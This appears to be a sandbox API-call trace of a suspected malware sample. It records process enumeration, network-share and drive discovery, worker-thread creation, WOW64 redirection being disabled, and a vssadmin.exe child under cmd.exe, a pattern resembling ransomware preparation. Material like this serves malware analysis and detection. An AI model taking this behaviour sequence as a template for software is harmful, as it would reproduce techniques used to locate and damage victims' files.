	[0060.158] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0060.158] lstrlenW (lpString="explorer.exe") returned 12
	[0060.158] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0060.159] lstrlenW (lpString="spoolsv.exe") returned 11
	[0060.159] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0060.159] lstrlenW (lpString="taskhost.exe") returned 12
	[0060.159] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.160] lstrlenW (lpString="svchost.exe") returned 11
	[0060.160] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0060.161] lstrlenW (lpString="taskeng.exe") returned 11
	[0060.161] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0060.161] lstrlenW (lpString="taskhost.exe") returned 12
	[0060.161] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0060.162] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0060.162] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0060.162] lstrlenW (lpString="python tragedy.exe") returned 18
	[0060.162] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0060.163] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0060.163] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0060.163] lstrlenW (lpString="computers.exe") returned 13
	[0060.163] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0060.164] lstrlenW (lpString="separated.exe") returned 13
	[0060.164] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0060.164] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0060.164] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0060.164] lstrlenW (lpString="darkness.exe") returned 12
	[0060.165] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0060.165] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0060.165] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0060.166] lstrlenW (lpString="sophisticated.exe") returned 17
	[0060.166] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0060.166] lstrlenW (lpString="wishlist.exe") returned 12
	[0060.166] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0060.167] lstrlenW (lpString="top.exe") returned 7
	[0060.167] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0060.167] lstrlenW (lpString="implemented.exe") returned 15
	[0060.167] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0060.168] lstrlenW (lpString="comp.exe") returned 8
	[0060.168] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0060.168] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0060.168] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0060.169] lstrlenW (lpString="solved.exe") returned 10
	[0060.169] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0060.169] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0060.169] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0060.178] lstrlenW (lpString="trips.exe") returned 9
	[0060.178] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0060.179] lstrlenW (lpString="tumormanual.exe") returned 15
	[0060.179] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0060.179] lstrlenW (lpString="telecom.exe") returned 11
	[0060.179] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0060.180] lstrlenW (lpString="realistic.exe") returned 13
	[0060.180] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0060.180] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0060.180] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0060.181] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0060.181] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0060.181] lstrlenW (lpString="cmd.exe") returned 7
	[0060.181] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0060.182] lstrlenW (lpString="conhost.exe") returned 11
	[0060.182] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0060.183] lstrlenW (lpString="vssadmin.exe") returned 12
	[0060.183] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0060.183] lstrlenW (lpString="VSSVC.exe") returned 9
	[0060.183] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.184] lstrlenW (lpString="svchost.exe") returned 11
	[0060.184] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1
	[0060.184] lstrlenW (lpString="LogonUI.exe") returned 11
	[0060.184] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0
	[0060.184] CloseHandle (hObject=0x15c) returned 1
	[0060.185] Sleep (dwMilliseconds=0x1f4) 

Thread:
	id = 5
	os_tid = 0x954

	[0031.170] WaitForSingleObject (hHandle=0x18f9a4, dwMilliseconds=0xffffffff) returned 0xffffffff
	[0031.170] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df0ec8 | out: hHeap=0x7d60000) returned 1

Thread:
	id = 6
	os_tid = 0x958

	[0031.171] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0031.171] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7df2e00
	[0031.171] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2e00, Size=0x40) returned 0x7dd00f8
	[0031.171] GetLogicalDrives () returned 0x4
	[0031.171] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e297b8
	[0031.171] GetComputerNameW (in: lpBuffer=0x7e297bc, nSize=0x991ff6c | out: lpBuffer="XDUWTFONO", nSize=0x991ff6c) returned 1
	[0031.172] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1000) returned 0x7e0dfd8
	[0031.172] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x991ff3c | out: lphEnum=0x991ff3c*=0x7df1d68) returned 0x0
	[0031.172] WNetEnumResourceW (in: hEnum=0x7df1d68, lpcCount=0x991ff38, lpBuffer=0x7e0dfd8, lpBufferSize=0x991ff40 | out: lpcCount=0x991ff38, lpBuffer=0x7e0dfd8, lpBufferSize=0x991ff40) returned 0x103
	[0031.172] WNetCloseEnum (hEnum=0x7df1d68) returned 0x0
	[0031.172] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x991ff3c | out: lphEnum=0x991ff3c*=0xb4301c8) returned 0x0
	[0036.342] WNetEnumResourceW (in: hEnum=0xb4301c8, lpcCount=0x991ff38, lpBuffer=0x7e0dfd8, lpBufferSize=0x991ff40 | out: lpcCount=0x991ff38, lpBuffer=0x7e0dfd8, lpBufferSize=0x991ff40) returned 0x0
	[0036.342] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1000) returned 0xb4c1788
	[0036.342] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7e0dfd8, lphEnum=0x991ff10 | out: lphEnum=0x991ff10*=0x7df1ee8) returned 0x0
	[0036.454] WNetEnumResourceW (in: hEnum=0x7df1ee8, lpcCount=0x991ff0c, lpBuffer=0xb4c1788, lpBufferSize=0x991ff14 | out: lpcCount=0x991ff0c, lpBuffer=0xb4c1788, lpBufferSize=0x991ff14) returned 0x103
	[0036.454] WNetCloseEnum (hEnum=0x7df1ee8) returned 0x0
	[0036.454] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1000) returned 0xb4c2790
	[0036.454] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7e0dff8, lphEnum=0x991ff10 | out: lphEnum=0x991ff10*=0x0) returned 0x4b8
	[0056.608] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1000) returned 0xb4d3818
	[0056.608] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7e0e018, lphEnum=0x991ff10 | out: lphEnum=0x991ff10*=0x0) returned 0x4c6
	[0056.613] WNetEnumResourceW (in: hEnum=0xb4301c8, lpcCount=0x991ff38, lpBuffer=0x7e0dfd8, lpBufferSize=0x991ff40 | out: lpcCount=0x991ff38, lpBuffer=0x7e0dfd8, lpBufferSize=0x991ff40) returned 0x103
	[0056.613] WNetCloseEnum (hEnum=0xb4301c8) returned 0x0
	[0056.613] GetLogicalDrives () returned 0x4
	[0056.614] Sleep (dwMilliseconds=0x64) 
	[0056.854] GetLogicalDrives () returned 0x4
	[0056.854] Sleep (dwMilliseconds=0x64) 
	[0057.797] GetLogicalDrives () returned 0x4
	[0057.797] Sleep (dwMilliseconds=0x64) 
	[0057.924] GetLogicalDrives () returned 0x4
	[0057.924] Sleep (dwMilliseconds=0x64) 
	[0058.197] GetLogicalDrives () returned 0x4
	[0058.197] Sleep (dwMilliseconds=0x64) 
	[0058.476] GetLogicalDrives () returned 0x4
	[0058.476] Sleep (dwMilliseconds=0x64) 
	[0058.844] GetLogicalDrives () returned 0x4
	[0058.844] Sleep (dwMilliseconds=0x64) 
	[0059.030] GetLogicalDrives () returned 0x4
	[0059.030] Sleep (dwMilliseconds=0x64) 
	[0059.251] GetLogicalDrives () returned 0x4
	[0059.260] Sleep (dwMilliseconds=0x64) 
	[0060.173] GetLogicalDrives () returned 0x4
	[0060.173] Sleep (dwMilliseconds=0x64) 
	[0060.458] GetLogicalDrives () returned 0x4
	[0060.458] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 7
	os_tid = 0x95c

	[0032.629] GetTickCount () returned 0x1142eed
	[0032.629] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x24) returned 0x7df48b0
	[0032.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7df48b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x124
	[0032.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7df48b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c
	[0032.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7df48b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134
	[0032.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7df48b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c
	[0032.635] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e08
	[0032.635] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08e08, Size=0x20) returned 0x7df2ef0
	[0032.635] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e08
	[0032.635] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08e08, Size=0x20) returned 0x7df2f18
	[0032.635] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.636] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.636] Wow64DisableWow64FsRedirection (in: OldValue=0x9a1ff84 | out: OldValue=0x9a1ff84*=0x0) returned 1
	[0032.636] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.636] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2ef0 | out: hHeap=0x7d60000) returned 1
	[0032.636] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.636] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f18 | out: hHeap=0x7d60000) returned 1
	[0032.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x7df6758, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144
	[0032.638] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0032.932] GetTickCount () returned 0x1142fb8
	[0032.932] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0033.563] GetTickCount () returned 0x11431da
	[0033.563] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0033.953] GetTickCount () returned 0x1143360
	[0033.953] GetTickCount () returned 0x1143360
	[0033.953] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0034.351] GetTickCount () returned 0x11434e6
	[0034.351] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0035.227] GetTickCount () returned 0x114364d
	[0035.227] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0035.346] GetTickCount () returned 0x11436ca
	[0035.346] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0035.781] GetTickCount () returned 0x1143840
	[0035.781] GetTickCount () returned 0x1143840
	[0035.781] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0036.206] GetTickCount () returned 0x11439e5
	[0036.206] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0036.348] GetTickCount () returned 0x1143a72
	[0036.348] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0036.488] GetTickCount () returned 0x1143afe
	[0036.488] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0036.996] GetTickCount () returned 0x1143ce2
	[0036.996] GetTickCount () returned 0x1143ce2
	[0036.996] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0037.541] GetTickCount () returned 0x1143ee5
	[0037.541] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0038.048] GetTickCount () returned 0x11440d8
	[0038.048] GetTickCount () returned 0x11440d8
	[0038.048] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0038.477] GetTickCount () returned 0x114425e
	[0038.477] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0038.952] GetTickCount () returned 0x11443f3
	[0038.952] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0039.312] GetTickCount () returned 0x114455a
	[0039.312] GetTickCount () returned 0x114455a
	[0039.312] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0039.693] GetTickCount () returned 0x1144692
	[0039.693] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0039.902] GetTickCount () returned 0x114475d
	[0039.902] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0040.485] GetTickCount () returned 0x1144960
	[0040.485] GetTickCount () returned 0x1144960
	[0040.485] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0040.752] GetTickCount () returned 0x1144a69
	[0040.752] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0041.000] GetTickCount () returned 0x1144b63
	[0041.000] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0041.303] GetTickCount () returned 0x1144c6c
	[0041.303] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0041.682] GetTickCount () returned 0x1144de2
	[0041.682] GetTickCount () returned 0x1144de2
	[0041.682] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0042.142] GetTickCount () returned 0x1144f59
	[0042.142] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0042.488] GetTickCount () returned 0x1145071
	[0042.488] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0042.773] GetTickCount () returned 0x114516b
	[0042.773] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0043.145] GetTickCount () returned 0x11452e1
	[0043.145] GetTickCount () returned 0x11452e1
	[0043.145] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0043.618] GetTickCount () returned 0x11454b5
	[0043.618] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0044.007] GetTickCount () returned 0x114563b
	[0044.015] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0044.389] GetTickCount () returned 0x11457a2
	[0044.389] GetTickCount () returned 0x11457a2
	[0044.389] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0044.701] GetTickCount () returned 0x11458da
	[0044.701] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0045.093] GetTickCount () returned 0x1145a60
	[0045.093] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0045.249] GetTickCount () returned 0x1145afc
	[0045.249] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0045.435] GetTickCount () returned 0x1145bb7
	[0045.435] GetTickCount () returned 0x1145bb7
	[0045.435] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0045.731] GetTickCount () returned 0x1145ce0
	[0045.731] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0046.336] GetTickCount () returned 0x1145f31
	[0046.336] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0046.624] GetTickCount () returned 0x1146059
	[0046.624] GetTickCount () returned 0x1146059
	[0046.624] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0047.649] GetTickCount () returned 0x114645f
	[0047.649] GetTickCount () returned 0x114645f
	[0047.649] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0047.970] GetTickCount () returned 0x1146597
	[0047.970] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0048.137] GetTickCount () returned 0x1146642
	[0048.137] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0048.436] GetTickCount () returned 0x114676b
	[0048.436] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0048.650] GetTickCount () returned 0x1146845
	[0048.650] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0048.804] GetTickCount () returned 0x11468e1
	[0048.804] GetTickCount () returned 0x11468e1
	[0048.804] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0048.986] GetTickCount () returned 0x114698d
	[0048.986] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0050.019] GetTickCount () returned 0x1146d92
	[0050.019] GetTickCount () returned 0x1146d92
	[0050.019] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0050.237] GetTickCount () returned 0x1146e6d
	[0050.237] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0050.712] GetTickCount () returned 0x1147050
	[0050.712] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0051.367] GetTickCount () returned 0x11472df
	[0051.367] GetTickCount () returned 0x11472df
	[0051.367] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
